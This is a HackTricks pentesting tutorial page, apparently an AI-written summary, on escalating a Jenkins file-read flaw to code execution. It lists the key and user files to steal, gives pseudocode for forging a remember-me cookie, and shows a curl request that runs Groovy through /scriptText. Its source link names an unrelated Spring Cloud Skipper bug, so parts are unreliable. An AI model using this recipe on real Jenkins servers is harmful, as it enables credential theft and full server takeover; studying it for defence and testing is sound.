HackTricks CloudJenkins Arbitrary File Read to RCE via "Remember Me"
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/
This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
Attack Prerequisites
- Feature Requirement: "Remember me" must be enabled (default setting).
- Access Levels: Attacker needs Overall/Read permissions.
- Secret Access: Ability to read both binary and textual content from key files.
Detailed Exploitation Process
Step 1: Data Collection
User Information Retrieval
- Access user configuration and secrets from
$JENKINS_HOME/users/*.xmlfor each user to gather:- Username
- User seed
- Timestamp
- Password hash
Secret Key Extraction
- Extract cryptographic keys used for signing the cookie:
- Secret Key:
$JENKINS_HOME/secret.key - Master Key:
$JENKINS_HOME/secrets/master.key - MAC Key File:
$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac
- Secret Key:
Step 2: Cookie Forging
Token Preparation
-
Calculate Token Expiry Time:
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time -
Concatenate Data for Token:
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
MAC Key Decryption
-
Decrypt MAC Key File:
key = toAes128Key(masterKey) // Convert master key to AES128 key format decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file if not decrypted.hasSuffix("::::MAGIC::::") return ERROR; macKey = decrypted.withoutSuffix("::::MAGIC::::")
Signature Computation
-
Compute HMAC SHA256:
mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
Cookie Encoding
-
Generate Final Cookie:
cookie = base64.encode( username + ":" + tokenExpiryTime + ":" + tokenSignature ) // Base64 encode the cookie data
Step 3: Code Execution
Session Authentication
- Fetch CSRF and Session Tokens:
- Make a request to
/crumbIssuer/api/jsonto obtainJenkins-Crumb. - Capture
JSESSIONIDfrom the response, which will be used in conjunction with the remember-me cookie.
- Make a request to
Command Execution Request
-
Send a POST Request with Groovy Script:
curl -X POST "$JENKINS_URL/scriptText" \ --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ --header "Jenkins-Crumb: $CRUMB" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "script=$SCRIPT"- Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.